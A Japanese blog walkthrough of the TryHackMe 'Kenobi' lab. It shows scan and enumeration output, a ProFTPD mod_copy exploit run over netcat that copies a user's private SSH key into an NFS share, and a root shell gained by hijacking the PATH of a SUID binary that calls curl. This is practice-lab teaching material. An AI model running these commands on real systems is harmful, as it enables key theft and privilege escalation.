はじめに
TryHackMe という Hack the Box のようなサービスを最近やっています。 https://tryhackme.com/
(TryHackMe に関してはブログの方にでもいつかレビューを載せようと思うのでここでは説明を割愛します。)
cheat sheet
以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET
nmap(port scan)
root@kali:~# nmap -sV -sV 10.10.162.244
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-29 15:57 UTC
Nmap scan report for ip-10-10-162-244.eu-west-1.compute.internal (10.10.162.244)
Host is up (0.0012s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
MAC Address: 02:BA:34:C3:7D:40 (Unknown)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.47 secondsnmap(smb のスキャン)
ファイル共有の一覧を列挙 https://nmap.org/nsedoc/scripts/smb-enum-shares.html
リモートの Windows システム上のユーザーを列挙 https://nmap.org/nsedoc/scripts/smb-enum-users.html
以下のページがわかりやすいかも http://www.byakuya-shobo.co.jp/hj/moh2/pdf/moh2_p120_p131.pdf
root@kali:~# nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.162.244
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-29 16:11 UTC
Nmap scan report for ip-10-10-162-244.eu-west-1.compute.internal (10.10.162.244)
Host is up (0.0027s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 02:BA:34:C3:7D:40 (Unknown)
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.162.244\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.162.244\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.162.244\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 0.70 seconds
root@kali:~# nmap -p 139 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.162.244
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-29 16:17 UTC
Stats: 0:00:00 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 50.00% done; ETC: 16:17 (0:00:01 remaining)
Nmap scan report for ip-10-10-162-244.eu-west-1.compute.internal (10.10.162.244)
Host is up (0.00019s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
MAC Address: 02:BA:34:C3:7D:40 (Unknown)
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.162.244\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.162.244\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.162.244\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 0.70 secondssmbclient
smbclient - サーバー上の SMB/CIFS リソースにアクセスする
ftp みたいなコマンドですね
root@kali:~# smbclient //10.10.162.244/anonymous
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 10:49:09 2019
.. D 0 Wed Sep 4 10:56:07 2019
log.txt N 12237 Wed Sep 4 10:49:09 2019
9204224 blocks of size 1024. 6877112 blocks availablesmbget
smbget - SMB 経由でファイルをダウンロード
root@kali:~# smbget -R smb://10.10.162.244/anonymous
Password for [root] connecting to //anonymous/10.10.162.244:
Using workgroup WORKGROUP, user root
smb://10.10.162.244/anonymous/log.txt
Downloaded 11.95kB in 2 secondsnmap
https://nmap.org/nsedoc/scripts/nfs-ls.html https://nmap.org/nsedoc/scripts/nfs-showmount.html https://nmap.org/nsedoc/scripts/nfs-statfs.html
root@kali:~# nmap -p 111 -script=nfs-ls,nfs-statfs,nfs-showmount 10.10.162.244
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-29 17:18 UTC
Nmap scan report for ip-10-10-162-244.eu-west-1.compute.internal (10.10.162.244)
Host is up (0.00017s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-ls: Volume /var
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 .
| rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 ..
| rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups
| rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache
| rwxrwxrwt 0 0 4096 2019-09-04T08:43:56 crash
| rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local
| rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock
| rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log
| rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www
|_
| nfs-showmount:
|_ /var *
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /var 9204224.0 1836520.0 6877108.0 22% 16.0T 32000
MAC Address: 02:BA:34:C3:7D:40 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.41 secondssearchsploit
root@kali:~# searchsploit ProFTPD 1.3.5
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | exploits/linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | exploits/linux/remote/36803.py
ProFTPd 1.3.5 - File Copy | exploits/linux/remote/36742.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result‘mod_copy’の脆弱性を使用します
https://scan.netsecurity.ne.jp/article/2015/07/13/36847.html
exploit
root@kali:~# nc 10.10.217.211 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.217.211]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successfulこれで/var/tmp 内に ssh の鍵がコピーされました
ssh 鍵を取得して user.txt をとる
root@kali:~# mkdir /mnt/kenobiNFS
root@kali:~# mount 10.10.217.211:/var /mnt/kenobiNFS
root@kali:~# ls -la /mnt/kenobiNFS
total 56
drwxr-xr-x 14 root root 4096 Sep 4 2019 .
drwxr-xr-x 3 root root 4096 Apr 30 06:54 ..
drwxr-xr-x 2 root root 4096 Sep 4 2019 backups
drwxr-xr-x 9 root root 4096 Sep 4 2019 cache
drwxrwxrwt 2 root root 4096 Sep 4 2019 crash
drwxr-xr-x 40 root root 4096 Sep 4 2019 lib
drwxrwsr-x 2 root staff 4096 Apr 12 2016 local
lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep 4 2019 log
drwxrwsr-x 2 root mail 4096 Feb 26 2019 mail
drwxr-xr-x 2 root root 4096 Feb 26 2019 opt
lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run
drwxr-xr-x 2 root root 4096 Jan 29 2019 snap
drwxr-xr-x 5 root root 4096 Sep 4 2019 spool
drwxrwxrwt 6 root root 4096 Apr 30 06:49 tmp
drwxr-xr-x 3 root root 4096 Sep 4 2019 wwwroot@kali:~# ssh -i id_rsa [email protected]これで user.txt が取れます
privilege escalation
SUID なファイルを探します
kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6/usr/bin/menu なんて普通ありますっけ?
menu
menu のコマンドを試しに使ってみます
kenobi@kenobi:~$ menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2020 07:28:56 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: "c8-591b6884b6ed2"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/htmlこんな感じです
menu のバイナリをみてみる
kenobi@kenobi:~$ strings /usr/bin/menu
(省略)
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
Invalid choice
(省略)menu では内部で curl が実行されています
curl をすり替えて PE
kenobi@kenobi:~$ echo /bin/sh > /tmp/curl
kenobi@kenobi:~$ chmod 777 /tmp/curl
kenobi@kenobi:~$ export PATH=/tmp:$PATH
kenobi@kenobi:~$ echo $PATH
/tmp:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
kenobi@kenobi:~$ menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
# cat /root/root.txtroot.txt が取れました
終わりに
最後の curl を置き換えるところとか頭いいなって思いました(僕は知らなかったけど割とありがちな手法なんですかね?)
TryHackMe の Vip1 ヶ月で終わらせたいので頑張ります
